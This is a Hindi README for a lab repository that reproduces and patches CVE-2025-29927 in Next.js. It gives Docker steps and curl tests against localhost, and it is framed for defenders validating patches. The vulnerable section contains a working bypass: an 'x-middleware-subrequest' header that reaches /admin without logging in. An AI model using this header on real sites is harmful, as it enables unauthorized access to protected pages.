
CVE-2025-29927 भेद्यता का पुनरुत्पादन और समाधान।
CVE-2025-29927 भेद्यता का पुनरुत्पादन और सुधार।
git clone [email protected]:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
vulnerable/ में एप्लिकेशन का एक संस्करण है जो हमले के प्रति संवेदनशील है। fixed/ में एप्लिकेशन का एक संस्करण है जो न्यूनतम संस्करण में अपग्रेड किया गया है जो भेद्यता को ठीक करता है।
⚠️ महत्वपूर्ण: ये उदाहरण डिफेंडरों, शोधकर्ताओं और पैचिंग को मान्य करने वाली टीमों के लिए प्रदान किए गए हैं। इन छवियों को सार्वजनिक या उत्पादन नेटवर्क पर न चलाएं। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जहां आपके पास स्पष्ट लिखित अनुमति है।
CVE-2025-29927 भेद्यता का पुनरुत्पादन।
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए
curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
फिर यह कमांड चलाएं, जो एडमिन पेज तक पहुंचने में सक्षम होना चाहिए
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
...
CVE-2025-29927 भेद्यता का सुधार।
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
यह कमांड चलाएं, जिसे लॉगिन पेज पर रीडायरेक्ट होना चाहिए
curl -i http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
फिर यह कमांड चलाएं, जिसे अब भी लॉगिन पेज पर रीडायरेक्ट होना चाहिए
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
यह रिपॉजिटरी l1uk/nextjs-middleware-exploit पर आधारित है, लेकिन Next.js के संस्करण 15.x के लिए अनुकूलित किया गया है।